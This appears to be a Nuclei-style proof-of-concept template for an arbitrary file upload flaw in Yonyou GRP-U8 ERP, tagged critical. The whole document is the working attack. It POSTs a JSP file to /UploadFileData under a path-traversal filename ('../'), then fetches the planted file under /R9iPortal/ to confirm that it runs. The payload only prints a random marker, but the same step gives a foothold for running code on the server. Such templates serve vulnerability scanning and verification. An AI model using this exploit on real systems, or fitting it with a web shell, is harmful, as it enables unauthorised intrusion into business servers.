id: poc-yaml-yonyou-erp-u8-file-upload

info:
  name: poc-yaml-yonyou-erp-u8-file-upload
  author: Aurora
  severity: critical
  tags: xray-converted,fileupload,ct-456684
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html

http:
  - raw:
      - |
        POST /UploadFileData?action=upload_file&filename=../.{{rand_base(8)}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rand_base(8)}}

        ------WebKitFormBoundary{{rand_base(8)}}
        Content-Disposition: form-data; name="upload"; filename="{{rand_base(8)}}.jsp"
        Content-Type: application/octet-stream
        
        <% {out.print("{{rand_base(8)}}");} %>
        ------WebKitFormBoundary{{rand_base(8)}}
        Content-Disposition: form-data; name="submit"
        
        submit
        ------WebKitFormBoundary{{rand_base(8)}}--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "showSucceedMsg"
  - raw:
      - |
        GET /R9iPortal/.{{rand_base(8)}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200